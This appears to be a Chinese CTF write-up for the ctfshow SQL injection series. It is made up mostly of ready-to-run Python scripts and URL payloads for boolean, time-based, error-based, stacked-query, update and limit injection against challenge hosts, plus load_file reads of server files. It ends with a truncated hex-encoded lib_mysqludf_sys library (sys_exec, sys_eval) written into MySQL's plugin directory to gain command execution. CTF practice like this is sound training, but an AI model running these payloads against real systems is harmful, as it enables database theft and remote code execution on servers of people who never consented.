1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,1,'A'),2,'B'),3,'C'),4,'D'),5,'E'),6,'F'),7,'G'),8,'H'),9,'I'),0,'J'),'b' from ctfshow_user4 where username='flag' %23
import requests import time import binascii dicts = '0123456789abcdefghijklmnopqrstuvwxyz-}' flag = 'ctfshow{' url = 'http://7d2f63f3-cdef-40f1-bb7b-c5865311ee95.challenge.ctf.show/select-waf.php' deftohex(string): return binascii.hexlify(string.encode('utf-8')).decode('utf-8') with requests.Session() as session: for i inrange(1, 64): for s in dicts: data = {'tableName': f"ctfshow_user group by pass having pass like 0x{tohex(flag + s + '%')}"} try: res = session.post(url, data=data) if'$user_count = 1'in res.text: flag += s print(f"Current flag: {flag}") break except requests.RequestException as e: print(f"Error occurred: {e}") time.sleep(0.5) print(f"Final flag: {flag}")
for i inrange (1,64): for s in dicts: payload = flag + list(s) payload.append("%") # 进行匹配 concat_payload = 'concat(' +','.join([tofunc(ord(x))for x in payload])+')' data = {'tableName':'ctfshow_user group by pass having pass like {}'.format(concat_payload)} res=requests.post(url,data=data) if res.text.find('$user_count = 0') == -1: flag.append(s) print(''.join(flag)) time.sleep(3) break
#author:yu22x import requests import string url="http://8319afbf-281c-4a73-b14e-a29426d0e556.challenge.ctf.show/select-waf.php" s='0123456789abcdef-{}' defconvert(strs): t='concat(' for s in strs: t+= 'char(true'+'+true'*(ord(s)-1)+'),' return t[:-1]+")" flag='' for i inrange(1,45): print(i) for j in s: d = convert(f'^ctfshow{flag+j}') data={ 'tableName':f' ctfshow_user group by pass having pass regexp({d})' } #print(data) r=requests.post(url,data=data) #print(r.text) if("user_count = 1"in r.text): flag+=j print(flag) if j=='}': exit(0) break
load_file() 是 MySQL 中的一个函数,用于读取服务器上的文件。它能够从指定的文件路径读取文件内容,并将其作为字符串返回。
regexp 是 MySQL 中用于正则表达式匹配的操作符。它的作用是将文件内容与正则表达式进行匹配。
0x01
1 2 3 4 5 6 7 8 9 10 11 12 13
import requests import string dicts=string.digits+string.ascii_lowercase+"-"+"}" url = 'http://91a55175-5819-43ae-bd47-e9b866b79eeb.challenge.ctf.show/api/index.php' flag = 'ctfshow{' for i inrange(1, 64): for s in dicts: payload = 'if(load_file(\'/var/www/html/api/index.php\')regexp(\'{}\'),1,0)'.format(flag+s) res = requests.post(url, data={'username':payload, 'password':'1'}) if res.text.find('67e5') != -1: flag += s print(flag) break
flag = "" #这个位置,是群主耗费很长时间跑出来的位置~ for i inrange(257,257+60): for x in flagstr: data={ "username":"if(substr(load_file('/var/www/html/api/index.php'),{},1)=('{}'),1,0)".format(i,x), "password":"0" } print(data) response = requests.post(url,data=data) time.sleep(0.3) # 8d25是username=1时的页面返回内容包含的,具体可以看上面的截图~ if response.text.find("8d25")>0: print("++++++++++++++++++ {} is right".format(x)) flag+=x break else: continue print(flag)
web190
1
where username = '{$username}'";
根据这个可以用或进行绕过尝试注入得到flag,还是用盲注写
0x01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://27c9e10a-b6cd-4bcf-86e5-5a067c06f56e.challenge.ctf.show/api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_fl0g\' and table_schema=database()' payload = 'select f1ag from ctfshow_fl0g' s_payload = 'admin\' and if(substr(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
url = "http://36e8713a-b1fb-49c2-badb-4c4d66f5d1cb.challenge.ctf.show/api/" flag = "" for i inrange(1,60): max = 127 min = 32 while1: mid = (max+min)>>1 if(min == mid): flag += chr(mid) print(flag) break #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid) #ctfshow_web #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid) #ctfshow_fl0g #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid) #id,f1ag payload = "admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)
data = { "username":payload, "password":0, } res = requests.post(url = url,data =data) time.sleep(0.3) if res.text.find("8bef")>0: max = mid else: min = mid
web191
本题过滤了ASCII,可以继续web190的0x01
0x01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://42161408-1017-4aef-83ce-c22452b3d107.challenge.ctf.show/api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_fl0g\' and table_schema=database()' payload = 'select f1ag from ctfshow_fl0g' s_payload = 'admin\' and if(substr(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
url = "http://60a3f535-f0c5-40d6-9e63-fe058bf95762.challenge.ctf.show/api/" flag = "" for i inrange(1,60): max = 127 min = 32 while1: mid = (max+min)>>1 if(min == mid): flag += chr(mid) print(flag) break #payload = "admin'and (ord(substr((select database()),{},1))<{})#".format(i,mid) #ctfshow_web #payload = "admin'and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid) #ctfshow_fl0g #payload = "admin'and (ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid) #id,f1ag payload = "admin'and (ord(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)
data = { "username":payload, "password":0, } res = requests.post(url = url,data =data) time.sleep(0.3) if res.text.find("8bef")>0: max = mid else: min = mid
web192
本题多过滤了ord和hex函数,还是可以继续用上面的脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://6fec3a09-c862-4062-9893-f46b784267f2.challenge.ctf.show/api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_fl0g\' and table_schema=database()' payload = 'select f1ag from ctfshow_fl0g' s_payload = 'admin\' and if(substr(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://8a35e846-e2ed-464b-9843-19e404a9158d.challenge.ctf.show//api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_flxg\' and table_schema=database()' payload = 'select f1ag from ctfshow_flxg' s_payload = 'admin\' and if(mid(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
web194
多过滤了char|left|right|substring这些,上题的脚本继续用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
import requests import string import time dicts=string.digits+string.ascii_lowercase+"-"+"{}"+"," url = 'http://5d33d7d6-6708-4e4a-82ed-38708c8d1276.challenge.ctf.show//api/index.php' flag = ''
for i inrange(1,64): for s in dicts: #payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()' #payload = 'select group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_flxg\' and table_schema=database()' payload = 'select f1ag from ctfshow_flxg' s_payload = 'admin\' and if(mid(({}),{},1)=\'{}\',1,0)#'.format(payload,i,s) res = requests.post(url,data={'username':s_payload,'password':'1'} ) if res.text.find('5bc6') != -1: flag += s print(flag) time.sleep(0.5) break
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://9a47d60c-a58c-473d-8fda-bcd4534a6d2a.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: #payload = {"ip":f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.5),0)",'debug':1} #payload = {"ip":f"if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{index},1)='{char}',sleep(0.5),0)",'debug':1} payload = {"ip":f"if(substr((select flaga from ctfshow_flagx),{index},1)='{char}',sleep(0.5),0)",'debug':1}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://fcff0b3a-2480-4088-88e3-4a8554259ae8.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(1),0)#"} #payload = {'debug':'1',"ip":f"0' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{index},1)='{char}',sleep(1),0)#"} payload = {'debug':'1',"ip":f"0' or if(substr((select flagaa from ctfshow_flagxc),{index},1)='{char}',sleep(1),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=1: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://8184624f-3ac4-4ac2-b195-865a82d8cb94.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(1),0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{index},1)='{char}',sleep(1),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaac from ctfshow_flagxcc),{index},1)='{char}',sleep(1),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=1: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://078b3b8c-d67e-4948-b1f2-239e5176f712.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',BENCHMARK(1000000, MD5('orange')),0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{index},1)='{char}',BENCHMARK(1000000, MD5('orange')),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaabc from ctfshow_flagxccb),{index},1)='{char}',BENCHMARK(1000000, MD5('orange')),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://380bc0f7-937d-4516-a20e-aaa284e086a2.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaac from ctfshow_flagxc),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.3: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://eca68551-e138-419b-a9f7-8bff2348458d.challenge.ctf.show//api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} #payload = {'debug':'1',"ip":f"0) or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxca'),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"} payload = {'debug':'1',"ip":f"0) or if(substr((select flagaabc from ctfshow_flagxca),{index},1)='{char}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.2: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://581c4aa9-8e30-4f3e-9253-216e7c43703a.challenge.ctf.show/api/index.php'
defget_flag_char(index): for char in dicts:
#payload = {'debug':'0', "ip": f"0) or if(left((select table_name from information_schema.tables where table_schema=database() limit 0, 1),{index})regexp('{flag+char}'),(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} #payload = {'debug':'0', "ip": f"0) or if(left((select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1, 1),{index})regexp('{flag+char}'),(SELECT count(*) FROM information_schema.columns A, information_schema.columns B), 0)#"} payload = {'debug':'1',"ip":f"0) or if(left((select flagaabcc from ctfshow_flagxcac),{index})regexp('{flag+char}'),(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)#"}
# 构造完整请求 URL try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=0.2: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
到这边盲注就结束了,略感疲惫。
web221
limit注入
1
$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;
""" Author:Y4tacker """ import requests defgenerateNum(num): res = 'true' if num == 1: return res else: for i inrange(num - 1): res += "+true" return res
url = "http://f1d0f6ad-cd9f-432a-885f-42f4c6f20289.challenge.ctf.show/api/" i = 0 res = "" while1: head = 32 tail = 127 i = i + 1
while head < tail: mid = (head + tail) >> 1 # 查数据库-ctfshow_flagas #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 查字段-flagasabc #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'" # 查flag payload = "select flagasabc from ctfshow_flagas" params = { "u": f"if(ascii(substr(({payload}),{generateNum(i)},{generateNum(1)}))>{generateNum(mid)},username,'a')" } r = requests.get(url, params=params) # print(r.json()['data']) if"userAUTO"in r.text: head = mid + 1 else: tail = mid if head != 32: res += chr(head) else: break print(res)
?username=0'; PREPARE 0raN9e FROM concat('selec',"t group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagasa'"); EXECUTE 0raN9e;
1
?username=0'; PREPARE 0raN9e FROM concat('selec','t flagas from ctfshow_flagasa'); EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656c65637420646174616261736528293b;EXECUTE 0raN9e;
1
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E636174287461626C655F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D2763746673686F775F77656227;EXECUTE 0raN9e;
1
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D2763746673685F6F775F666C6167617327;EXECUTE 0raN9e;
1
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C61676173622066726F6D2063746673685F6F775F666C61676173;EXECUTE 0raN9e;
web227
尝试用了上题的预处理翻遍没找到,看看wp吧
0x01
没什么意义主要看0x02
1
?username=1';call getFlag();
0x02
文章,可以查看存储过程和函数的信息,SELECT * FROM information_schema.Routines
1
?username=-1';PREPARE 0raN9e from 0x53454C45435420202A202046524F4D2020696E666F726D6174696F6E5F736368656D612E526F7574696E6573;EXECUTE 0raN9e;
web228
1
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D2763746673685F6F775F666C61676173616127;EXECUTE 0raN9e;
1
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C6167617362612066726F6D2063746673685F6F775F666C616761736161;EXECUTE 0raN9e;ctfsh_ow_flagasaa
预处理转hex就行,基本同226
web229
1
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D27666C616727;EXECUTE 0raN9e;
1
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C6167617362612066726F6D20666C6167;EXECUTE 0raN9e;
web230
1
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D27666C6167616162627827;EXECUTE 0raN9e;
1
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C616761736261732066726F6D20666C61676161626278;EXECUTE 0raN9e;
这些题都可以是这一个做法,就不多讲了
web231
1
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
从这里开始是update注入,网络看一下api默认是?page=1&limit=10
可以进行post传参逐步得到flag
1
password=1',username=database()#&username=1
1
password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web')#&username=1
1
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=1
1
password=1',username=(select flagas from flaga)#&username=1
web232
有了MD5加密,用括号提前闭就行
1
password=1'),username=database()#&username=1
1
password=1'),username=(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web')#&username=1
1
password=1'),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa')#&username=1
1
password=1'),username=(select flagass from flagaa)#&username=1
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://5495de70-dd5c-41c5-bcab-d784b3e7f768.challenge.ctf.show/api/delete.php'
defget_flag_char(index): for char in dicts: #payload = {"id": f"0 or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.2),0)"} #payload = {"id": f"0 or if(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{index},1)='{char}',sleep(0.2),0)"} payload = {"id": f"0 or if(substr((select flag from flag),{index},1)='{char}',sleep(0.2),0)"}
try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=3: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://414d893d-2ded-40da-9e5f-cb54d1dcb9a6.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((select flag from ctfshow_flag),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
0x02
利用报错注入
1
?id=0'or (select 1 from (select count(*),concat(0x7e,(database()),0x7e,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23
1
?id=0'or (select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow_web')),0x7e))%23
1
?id=0'or (select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flag')),0x7e))%23
1
?id=0'or (select updatexml(1,concat(0x7e,(select flag from ctfshow_flag)),0x7e))%23
1
?id=0'or(select updatexml(1,concat(0x7e,substring((select flag from ctfshow_flag),1),0x7e),0x7e))%23
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://e7e68c52-a18f-469f-b68e-3e790007590b.challenge.ctf.show/api/'
def get_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((select flag1 from ctfshow_flagsa),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") return None for i in range(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
0x02
过滤了updatexml,但是extractvalue还是可以正常使用的
1
?id=0'or (select extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()))))%23
1
?id=0'or (select extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagsa'))))%23
1
?id=0'or (select extractvalue(1,concat(0x7e,substring((select flag1 from ctfshow_flagsa),-10))))%23
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://2d7a2d28-52c4-4c83-90c5-1b8381016399.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flags'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((select flag2 from ctfshow_flags),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},?' flag = '' url = 'http://04452d8b-ead5-40c6-be43-a04620fe4583.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((SELECT `flag?` FROM ctfshow_flagsa),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
需要注意的是由于有问号,所以需要加反引号
0x02
报错注入可以看网上wp不多赘叙
web248
这方面是知识盲区了,学一下吧
udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到 Mysql 中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。udf 文件后缀一般为 dll,由 C、C++ 编写。
1
?id=1';select version();%23
查看版本,大于5.1版本,继续查 plugin 目录
1
?id=0';select @@plugin_dir;%23
得到路径为:/usr/lib/mariadb/plugin/
1
?id=0';select '7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665